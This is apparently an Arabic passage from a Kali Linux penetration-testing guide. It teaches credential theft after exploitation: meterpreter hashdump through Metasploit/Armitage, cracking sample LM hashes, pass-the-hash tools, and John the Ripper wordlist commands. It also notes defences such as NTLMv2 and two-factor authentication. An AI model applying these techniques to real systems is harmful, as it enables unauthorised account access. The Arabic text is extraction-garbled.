ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﻋﺎدة ﻣﺎ ﯾﺗم اﻟﻘﯾﺎم ﺑﮭﺎ ﻋن ﺑﻌد وﺗﻛون ﺑﻌد أطﻼق exploitﺑﻧﺟﺎح ﺿد اﻟﺟﮭﺎز اﻟﮭدف .ﻓﻲ ﻣﺛﺎﻟﻧﺎ
اﻟﺳﺎﺑﻖ ،ﻋﻧدﻣﺎ ﺗﺣدﺛﻧﺎ ﻋن اﺳﺗﺧدام Metasploitﻹطﻼق ﺣﻣوﻟﺔ VNCﻋﻠﻰ ھدﻓﻧﺎ اﻟﺑﻌﯾد .ﻓﻲ ﺣﯾن أن ﺣﻣوﻟﺔ VNCھو ﺑﺎﻟﺗﺄﻛﯾد ﻣﻣﺗﻌﺔ،
وﻟﻛﻧﻧﺎ ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻗذﯾﻔﺔ .Meterpreterوﺳوف ﺗﺳﺗﺧدم Metasploitﻟﻠﺣﺻول ﻋﻠﻰ ﺷل ﻋن ﺑﻌد ﻋﻠﻰ اﻟﮭدف واﻟﺗﻲ ﺗوﻓر ﻟﻧﺎ
اﻟوﺻول إﻟﻰ اﻟﻌدﯾد ﻣن أواﻣر اﻟﺗرﻣﻧﺎل )ﺑﯾن أﻣور أﺧرى( واﻟﺗﻲ ﺗﺳﮭل ﺟﻣﻊ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﺑﺳﮭوﻟﮫ .ﺑﻌد ﺗﺷﻐﯾل ﺟﻠﺳﺔ Meterpreter
ﻋﻠﻰ اﻟﮭدف اﻟﺧﺎص ﺑك ،ﺑﺑﺳﺎطﺔ ﻧدﺧل اﻷﻣر " Meterpreter.“ hashdumpﺳوف ﯾﺗﺟﺎوز ﺟﻣﯾﻊ اﻵﻟﯾﺎت اﻷﻣﻧﯾﺔ اﻟﻘﺎﺋﻣﺔ ﻟوﯾﻧدوز
وﺳوف ﺗﻘدم ﻟك اﺳم اﻟﻣﺳﺗﺧدم اﻟﻣﺳﺗﮭدف و اﻟﮭﺎش اﻟﻣﻘﺎﺑل ﻟﮫ.
ﻟﺳﮭوﻟﺔ اﻻﻣر ﺳوف ﻧﺳﺗﺧدم اﻷداة armitageواﻟﺗﻲ ﺗﻌﺗﺑر اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﻟل metasploitواﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺳوف ﻧﻘوم ﺑﺈطﻼق
exploitﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﺛم ﻧﻧﺷﺊ meterpreter sessionﻧﺎﺟﺢ ﻋﻠﯾﮫ ﻛﺎﻻﺗﻰ:
ﺑﻌد إطﻼق exploitﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف وﻓﺗﺢ meterpreter sessionﻋﻠﯾﮫ ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر hashdumpﻛﺎﻻﺗﻰ:
اﻧظر ﻣﺎذا ﺣدث اﺳﺗطﺎع اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور وھﻲ Empty passwordاﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش اﻟذي ادﺧﻠﻧﮭﺎ وﻗد اﺳﺗﻐرق وﻗﺗﺎ ﻻ ﯾزﯾد ﻋن
ﺛﺎﻧﯾﺗﯾن.
ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش ذات ﺻﻌوﺑﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ:
Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4
ﻧﺟد اﻧﮫ اﺳﺗﻐرق 4ﺛواﻧﻲ ﻟﻌطﺎء اﻟﻧﺗﯾﺟﺔ .ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش أﺻﻌب ﻣن ذي ﻗﺑل ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ:
Hash: d4b3b6605abec1a16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6
ﻧﺟد اﻧﮫ اﺳﺗﻐرق ﻣن اﻟوﻗت 6ﺛواﻧﻲ ﻹﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش.
ﻣؤﺛرة ﺟدا ،ﻓﻠﻘد اﺳﺗﻐرق ﻓﻘط 7-4ﺛواﻧﻲ ﻓﻲ ھذا اﻻﺧﺗﺑﺎر ﻟﻛﺳر ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻌﻘدة اﻟﻣﻛوﻧﺔ ﻣن 14ﺣرف .ھذه اﻷداة ﻣﺧﺻﺻﮫ
ﻟﮭﺎش LMﻓﻲ وﯾﻧدوز XPوﻟﯾﺳت ﻟوﯾﻧدوز /8/7ﺳﯾرﻓر 2008اﻟﺗﻲ ﺗﺳﺗﻧد ﻋﻠﻰ ھﺎش NTLMاﻟذي ﯾﻌد أﻛﺛر أﻣﻧﻧﺎ.
وﻟﻛن ،أﻋﺗﻘد أﻧﮫ ﻣﻊ زﯾﺎدة ﺳرﻋﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ،ﻓﺄن اﻻﻋﺗﻣﺎد ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻗد ﻻ ﺗﻛون ﻣﻘﯾﺎس أﻣﻧﻲ ﺟﯾد .ﺣﯾث اﻟﻌدﯾد ﻣن
اﻟﺷرﻛﺎت واﻟﻣراﻓﻖ اﻟﺣﻛوﻣﯾﺔ اﺑﺗﻌدت ﻋن اﺳﺗﺧدام ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻓﻘط واﺳﺗﺧدﻣت أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﻣزدوﺟﺔ .اﻟﻣﻘﺎﯾﯾس اﻟﺣﯾوﯾﺔ
) (Biometricsواﻟﺑطﺎﻗﺎت اﻟذﻛﯾﺔ ) (smartcardsأﺻﺑﺣت أﻛﺛر ﺷﻌﺑﯾﺔ ﻓﻲ أﻻﻣﺎﻛن اﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﻣﺳﺗوﯾﺎت اﻣﻧﯾﮫ ﻋﺎﻟﯾﺔ.
ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدم اﻟﮭﺎش اﻟذي اﺳﺗﺧرﺟﻧﺎه ﻣن ﻗﺑل وﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺑﺻورة واﺿﺣﺔ.
Hash-identifier
ھﻲ أداة ﺑﺎﯾﺛون ﺗﺳﺗﺧدم ﻟﺗﺣدﯾد أﻧواع اﻟﮭﺎش وﻣدﻣﺟﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ .ﻣﻌظم أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل John the Ripper
ﺗﺷﻣل وظﯾﻔﺔ اﻟﻛﺷف اﻟﺗﻠﻘﺎﺋﻲ ﻋن اﻟﮭﺎش اﻟﺗﻲ ھﻲ ﺟﯾدة ﺟدا ،ورﺑﻣﺎ 90ﻓﻲ اﻟﻣﺋﺔ ﻧﺳﺑﺔ دﻗﺗﮭﺎ .ھذه اﻷداة ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻧوع
اﻟﮭﺎش ﯾدوﯾﺎ .ﺑﺑﺳﺎطﺔ ﻧﻘوم ﺑﺗﺷﻐﯾل Hash IDوﻧدﺧل ﻣﻌﮫ اﻟﮭﺎش .ھذا اﻟﺑرﻧﺎﻣﺞ ﺳوف ﯾﺗﺣﻘﻖ ﻣن ذﻟك وﯾﻌود اﻟﯾك ﺑﺎﻟﻧوع اﻻﻛﺛر ﺷﯾوﻋﺎ ﻣن
اﻟﮭﺎش اﻟﺗﻲ ﻟدﯾك ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ أﻧواع اﻷﻗل اﺣﺗﻣﺎﻻ.
ﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذه اﻷداة ﻣن ﻗﺎﺋﻣﺔ ادوات ﻛﺎﻟﻲ:
Kali LinuxPassword AttacksOffline AttacksHash-Identifier
ﻓﻘط ﻗم ﺑطﺑﺎﻋﺔ اﻟﮭﺎش و Hash IDﺳوف ﯾﻌود اﻟﯾك ﺑﻧوع ھذا اﻟﮭﺎش ﻛﺎﻻﺗﻰ:
Findmyhash
ھو ﺳﻛرﯾﺑت ﺑﺎﯾﺛون ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ،واﻟﺗﻲ ﺗﺳﺗﺧدم ﺧدﻣﺔ اﻻﻧﺗرﻧت اﻟﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر اﻟﮭﺎش .ﯾﺟب أن ﺗﻛون ﻣوﺻل إﻟﻰ اﻹﻧﺗرﻧت
ﻗﺑل اﺳﺗﺧدام ھذه اﻷداة.
اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ:
#findmyhash <Encryption> -h hash
ﻋﻠﻰ اﻟرﻏم ﻣن أن ﺑﻌض ھذه اﻟﮭﺟﻣﺎت ﻟم ﺗﻌد ﺗﻌﻣل ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺣدﺛﺔ .ﺣﯾث ﯾﺗم اﺻطﯾﺎد ﺑﻌض اﻵﻟﯾﺎت اﻟﻣﺳﺗﺧدﻣﺔ وﻣﻧﻌﮭﺎ .وﺗﻌﯾﯾن
NTLM2أو kerberosﺗﺳﺗﺧدم ﻟﮭزﯾﻣﺔ ھذا اﻟﻧوع ﻣن اﻟﮭﺟﻣﺎت .أﯾﺿﺎ ﻣﯾزة اﻟﺗﺣﻛم ﻓﻲ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم UACﻓﻲ وﯾﻧدوز 7اﻏﻠﻘت
اﻟﻛﺛﯾر ﻣن ھذه اﻟﮭﺟﻣﺎت وﻟﻛﻧﮭﺎ ﻣﺎ زاﻟت ﺗﻌﻣل ﺿد أﻧظﻣﺔ وﯾﻧدوز .XPﻟﻛن إذا ﺗم ﺗﻌطﯾل ،UACﻛﻣﺎ ﺳﻧرى ﻻﺣﻘﺎ ،ﻓﯾﻣﻛﻧﮭﺎ ﻓﻲ ھذه اﻟﺣﺎﻟﺔ.
ﻟﻛﻧﮫ ﻻ ﯾزال ﻣن اﻟﻣﻔﯾد إﻟﻘﺎء ﻧظرة ﻋﻠﻰ ﺑﻌض ﻣن ﺗﻘﻧﯾﺎت .Pass the Hash
Passing the Hash with Metasploit Psexec
Psexecرﺑﻣﺎ ﻛﺎن واﺣدا ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ Pass the Hashﻟﺳﻧوات ﻋده .وﯾﺗم ﺗﻧﻔﯾذه ﻣن ﺧﻼل وﺟود ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة وﻧﺷطﺔ
ﻣن ﺧﻼل .Meterpreterﺳوف ﯾﺷرح ﻻﺣﻘﺎ.
Passing the Hash Toolkit
ھﻲ ﻋﺑﺎره ﻋن ﻣﺟﻣوﻋﺔ أدوات ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ،واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﻻﺳﺗﺧدام اﻟﮭﺎش ﻷداء وظﺎﺋف ﻣﺧﺗﻠﻔﺔ .وأﺿﯾف ﻣؤﺧرا إﻟﻰ
ﻛﺎﻟﻲ وﯾﻣﻛن ﻓﺗﺢ ﻣن اﻟﻘﺎﺋﻣﺔ:
Kali Linux/Password Attacks/Passing the Hash
ﯾﻣﻛﻧك اﺳﺗﺧدام اﻷواﻣر ﻟﻠﻘﯾﺎم ﺑﺑﻌض اﻷﻣور اﻟﻣﺛﯾرة ﻟﻼھﺗﻣﺎم ﺟدا .ﻧﺣن ﻟن ﻧﻐطﻲ اﻷﻣر ،وﻟﻛن اﻟﻛﺛﯾر ﻣﻧﮭم ﻗد ﺗﺑدو ﻣﺗﺷﺎﺑﮭﺔ ﻟﻣﺳﺗﺧدﻣﻲ
وﯾﻧدوز .ﻣﺟرد اﺳﺗﺧدام اﻟﺗﻌﺑﯾر ) (--helpوﺳﺗﺣﺻل ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣﺳﺎﻋدة ﻣن ﺧﯾﺎرات اﻟﻣﮭﻣﺔ وﯾﺳﺗﺧدم:
John the Ripperھﻲ اﻛﺛر اداه ﺷﻌﺑﯾﮫ ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺳﺗﺧدﻣﺔ اﻟﯾوم .ﺣﯾث ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭﺎ ﺑﻛﺳر أﻧواع
ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر ،ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش John the Ripper .ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻻﻛﺗﺷﺎف اﻟﺗﻠﻘﺎﺋﻲ ﻟﻣﻌظم
اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﻟﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق .اﻟﻣﮭﺎﺟﻣﯾن ﯾﻔﺿﻠون ﻣﺛل ھذه اﻷداة ﻷﻧﮭﺎ ﻗﺎﺑﻠﺔ ﻟﻠﺗﺧﺻﯾص
وﯾﻣﻛن اﻋدادھﺎ ﻣﻊ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﺳرﯾﻊ ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور.
ﻋﻧد اﺳﺗﺧدام ھذه اﻷداة ﻓﺎن اول ﺷﻲء ﺗﻔﻌﻠﮫ ھو ﺗﺣدﯾث اﻟﻘﺎﻣوس اﻻﻓﺗراﺿﻲ .ﺣﯾث اﻧﻧﺎ وﺟدﻧﺎ ان ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ ﻣﺣدودة )ﺣواﻟﻲ
3115ﻛﻠﻣﺔ( وإﻧﮭﺎ ﻓﻲ ﻛﺛﯾر ﻣن اﻟﺣﺎﻻت ﻻ ﺗﻘوم ﺑﻛﺳر ﻛﻠﻣﺎت اﻟﺳر اﻟﺷﺎﺋﻌﺔ .ﯾﻣﻛﻧك أن ﺗﺟد ﻣﻠﻔﺎت اﻟﻘواﻣﯾس ﻣن ﺧﻼل ﺑﺣث ﺟوﺟل .ﻟﻠﺗﺣﻘﻖ
ﻣن ﺣﺟم ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺟدﯾدة ،ﻧﻘوم ﺑﻔﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر ،word countﺣﺎﻟﻣﺎ ﯾﺗم ﺗﺣﻣﯾل اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد اﻟﻧﺷط .ﻧﻘوم ﺑﺎﺳﺗﺧدام
ھذا اﻷﻣر .wc –l FILNAME
ﻣن اﻟﺷﺎﺋﻊ أن ﯾﻛون ھﻧﺎك ﻋﺑﺎرات ﻣﻛررة ﻋﻧد اﻟﺗﺣﻣﯾل واﻟﺟﻣﻊ ﺑﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﻣﺗﻌددة ﻣن اﻹﻧﺗرﻧت .ﻣن اﻟﻣﺳﺗﺣﺳن إزاﻟﺔ ھذه اﻟﺗﻛرارات
وﻛذﻟك اﻷﺣرف اﻟﻛﺑﯾرة ﺣﯾث ﯾﻘوم JTRﺑﺗﺑدﯾل أﻧﻣﺎط اﻟﺣروف ﺗﻠﻘﺎﺋﯾﺎ.
-ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﻛﻠﻣﺎت اﻟﻛﺑﯾرة ﻛﺎﻻﺗﻰ:
#tr©A-Z©a-z©<©Word_File©>©All_Lower_Case_File
-ﻣﺛﺎل ﻋﻠﻰ اﻷﻣر اﻟﻣﺳﺗﺧدم ﻹزاﻟﺔ اﻟﺗﻛرارات ﻛﺎﻻﺗﻰ:
#sort©-u©AllL_ower_Case_File©>©No_Duplicates_File
ﻣن أﺟل اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ ﻣرور ،ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﺑﻌض ﻣن اﻟﺧطوات اﻟﻣﮭﻣﺔ .ﻋﻠﯾﻧﺎ أوﻻ ﺗﺣدﯾد ﺧوارزﻣﯾﺔ اﻟﮭﺎش ،ﺛﺎﻧﯾﺎ
ﻧﺧﺗﺎر ﻛﻠﻣﺔ ﻣرور ﻋﺎدﯾﮫ ،ﺛﺎﻟﺛﺎ ﻧﻘوم ﺑﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور اﻟذي اﺧﺗرﻧﮭﺎ ﻣﻊ ﺧوارزﻣﯾﺔ اﻟﮭﺎش ،وأﺧﯾرا ﻧﻘﺎرن ھﺎش اﻟﻛﻠﻣﺔ اﻟﺗﻲ اﺧﺗرﻧﺎھﺎ ﻣﻊ ﻣن
اﻟﮭﺎش اﻟﮭدف .إذا ﺗطﺎﺑﻘﺎ ،ﻓﻧﺣن ﻧﻌﻠم أﻧﮭﺎ ﻛﻠﻣﺔ اﻟﻣرور اﻟﻌﺎدﯾﺔ ﻷﻧﮫ ﻻ ﯾوﺟد ﻧﺻﯾن ﻋﺎدﯾﯾن ﻣﺧﺗﻠﻔﯾن ﯾﻌطﯾﺎ ﻧﻔس اﻟﮭﺎش.
ﻋﻠﻰ اﻟرﻏم ﻣن أن ھذا ﻗد ﯾﺑدو وﻛﺄﻧﮭﺎ ﻋﻣﻠﯾﺔ ﺧرﻗﺎء ،أو ﺑطﯾﺋﺔ ﻟﻺﻧﺳﺎن ،ﻓﺄن اﻟﺣواﺳﯾب ﻣﺗﺧﺻﺻﺔ ﻓﻲ ﻣﮭﺎم ﻣﺛل ھذا .ﻧظرا ﻟﻘوة اﻟﺣوﺳﺑﺔ
اﻟﻣﺗﺎﺣﺔ اﻟﯾوم ،واﻟﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ ﻣن أرﺑﻊ اﻟﺧطوات اﻟﻣذﻛورة أﻋﻼه ھﻲ ﺗﺎﻓﮭﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻶﻻت اﻟﺣدﯾﺛﺔ .اﻟﺳرﻋﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ JTRﻓﻲ ﺗوﻟد ھﺎش
ﻛﻠﻣﺎت اﻟﻣرور ﺗﺧﺗﻠف ﺗﺑﻌﺎ ﻟﻠﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻹﻧﺷﺎء اﻟﮭﺎش واﻷﺟﮭزة اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾل JTRﻋﻠﯾﮭﺎ .ﻓﻣن اﻟﻣﺄﻣون اﻟﻘول إﻧﮫ ﺣﺗﻰ ﺟﮭﺎز
ﻛﻣﺑﯾوﺗر ﻣﺗوﺳط ﻗﺎدر ﻋﻠﻰ ﺗوﻟﯾد اﻟﻣﻼﯾﯾن ﻣن ﺗﺧﻣﯾن ﻟﻛﻠﻣﺎت ﻣرور اﻟوﯾﻧدوز ) (LMﻓﻲ ﻛل ﺛﺎﻧﯾﺔ .ﯾﺗﺿﻣن JTRﻣﯾزة أﻧﯾﻖ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك
ﻟﻘﯾﺎس أداء اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك .ﺳﯾﺗم ﻗﯾﺎس ھذا اﻟﻣﻌﯾﺎر ﻓﻲ ) .cracks per second (c/sﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذا ﻋن طرﯾﻖ ﻓﺗﺢ اﻟﺗرﻣﻧﺎل ﻓﻲ
ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس وﻛﺗﺎﺑﺔ اﻻﻣر اﻟﺗﺎﻟﻲ:
#john --test
ھذا ﺳوف ﯾوﻓر ﻟك ﻗﺎﺋﻣﺔ ﻣن ﻣﻘﺎﯾﯾس اﻷداء وﺗﺗﯾﺢ ﻟك ﻣﻌرﻓﺔ ﻣدى ﻛﻔﺎءة اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻓﻲ ﺗوﻟﯾد اﻟﺗﺧﻣﯾﻧﺎت اﻟﺗﻲ ﺗﺳﺗﻧد إﻟﻰ اﻷﺟﮭزة
اﻟﺧﺎﺻﺔ ﺑك واﻟﺧوارزﻣﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻟﮭﺎش ﻛﻠﻣﺎت اﻟﺳر.
ﻻﺳﺗﺧدام ﻣﻠف اﻟﻛﻠﻣﺎت اﻟﻣﺧﺻص ﻣﺛل اﻟﻣﻠف اﻟذي ﻗﻣت ﺑﺑﻧﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ واﻟذي ﯾﺳﻣﻰ ،No_Duplicates_Fileواﻟﺗﻲ ﺳوف
ﺗﺣﺗﺎﺟﮫ ﻟﺗﺣرﯾر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻻﻓﺗراﺿﯾﺔ .وﯾﻣﻛن ﻓﻌل ھذا ﻣن ﺧﻼل ﺗﻌدﯾل اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﻣﻠف ).(/etc/john/john.conf
ﻓﻲ ھذا اﻟﻣﻠف ،ﺳوف ﻧﺟد أﻧﮫ ﯾﺷﯾر اﻟﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت passwords.lstاﻓﺗراﺿﯾﺎ .وﻟﺗﻐﯾﯾر ھذه اﻟﻼﺋﺣﺔ ﺑﻼﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ اﻋددﺗﮭﺎ ﺳﺎﺑﻘﺎ
ﻧﻘوم ﺑﺗﺑدﯾل اﻟﺳطر ) (Wordlist = $JOHN/password.lstاﻟﻰ ) .(Wordlist = No_Duplicates_File.lstﺛﺎﻧﯾﺎ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت
اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ No_Duplicates_File.lstﯾﺟب أن ﯾﻛون ﻣوﺟودة ﻓﻲ اﻟﻣﺟﻠد اﻟﻣﺣدد ﻓﻲ اﻟﻣﻠف .john.confاو ﯾﻣﻛن ذﻟك ﺑﺎﺳﺗﺧدام
اﻟﺗﻌﺑﯾر) (--wordlistﺛم ﻣﻛﺎن اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت .ﻻﺳﺗﺧدام John the Ripperﻋﻠﻰ ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر ،ﻓﺳوف
ﻧﺣﺗﺎج أوﻻ إﻟﻰ ﻧﺳﺦ اﻟﻣﻠف إﻟﻰ اﻟﻣﺟﻠد johnواﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر ) .(/root/.john/ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺗﺷﻐﯾل John the Ripperﻋﻠﻰ
طرﯾﻖ اﻻﺗﻲ.
#john©hash
ﻟرؤﯾﺔ ﻧﺳﺑﺔ ﺗﻘد ھذا اﻻﻣر ﻓﻲ ﻋﻣﻠﮫ ﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق .Enter
ﻟﻠﺣﺻول ﻋﻠﻰ ھذه اﻷداة ﻟﻠﻌﻣل ﻓﻲ ﺑﯾﺋﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز أو ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﯾﻣﻛﻧك زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://www.openwall.com/
Johnny
Johnnyھﻲ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ﻟﻠﺗطﺑﯾﻖ John the Ripperذات اﻟﺷﻌﺑﯾﺔ اﻟﻛﺑﯾرة ﻓﻲ ﻛﺳر ﻛﻠﻣﺔ ﻣرور ﻟﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ.
وھﻲ ﻣﺛل إﺻدار ﺳطر اﻷواﻣر Johnny ، John the Ripperﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮫ ﺑﺎﺗﺧﺎذ اﺟراءات ﻷﻧواع ﻣﺧﺗﻠﻔﺔ
ﻣن ﻛﻠﻣﺎت اﻟﺳر ،ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة واﻟﮭﺎش Johnny .ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﻛﺷف اﻷﻟﻰ ﻟﻣﻌظم اﻟﮭﺎﺷﺎت وﻛﻠﻣﺎت اﻟﺳر
اﻟﻣﺷﻔرة ،ﻣﻣﺎ ﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻣﺧﺗﺑر اﻻﺧﺗراق.
ﻣﻠﺣوظﮫ :ﯾوﺟد ﺑﻌد اﻟﺗﺧﺻﯾﺻﺎت اﻟﻣﺗوﻓرة ﻓﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر John the Ripperﻏﯾر ﻣﺗوﻓرة ﻓﻲ اﻟﺗطﺑﯾﻖ Johnnyﻟذﻟك ﯾﻔﺿل
اﺳﺗﺧدام ﻧﺳﺧﺔ ﺳر اﻷواﻣر.
ﻣن ﺧﻼل ھده اﻟﺷﺎﺷﺔ ﻣن ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق Open password fileواﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺿﺢ اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش
اﻟذي ﻧرﯾد ﻓك ﺗﺷﻔﯾره اﻟﻰ ﻛﻠﻣﺎت ﻣرور واﺿﺣﺔ.
ﻣن ﺧﻼل ھذا اﻟﺗطﺑﯾﻖ ﻧﻼﺣظ وﺟود ﺷرﯾط أدوات ﻗﺎﺋﻣﻲ ﻋﻠﻰ اﻟﺟﺎﻧب اﻷﯾﻣن ﻋﻧد اﻟﻧﻘر ﻓوق Optionsواﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﻧﺣدد ﻧوﻋﮫ اﻟﮭﺟوم
ﻟﻛﺳر ھﺎش ﻛﻠﻣﺎت اﻟﻣرور.
ﻧﺗﺎﺋﺞ ھذا اﻟﺗطﺑﯾﻖ ﺗﺣﻣل %90ﻧﺗﺎﺋﺞ ﺻﺣﯾﺣﮫ.
ﻧﻼﺣظ ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ wordlist modeاﻧﮫ ﯾﻣﻛﻧك اﺧﺗﯾﺎر ﻻﺋﺣﺔ اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗرﯾدھﺎ.
L0phtCrack
اﻟﻣﺻدرhttp://www.l0phtcrack.com :
L0phtCrackھﻲ أداة ﻣﺻﻣﻣﺔ ﻟﺗدﻗﯾﻖ ﻛﻠﻣﺔ اﻟﻣرور واﺳﺗﻌﺎدة اﻟﺗطﺑﯾﻘﺎت .ﯾﺗم اﺳﺗﺧداﻣﮫ ﻻﺳﺗرداد ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻔﻘودة ﻟﻣﺎﯾﻛروﺳوﻓت
وﯾﻧدوز ﺑﻣﺳﺎﻋدة ،rainbow table ،hybrid ،dictionaryو brute force attacksوﯾﺗم اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻗوة ﻛﻠﻣﺔ
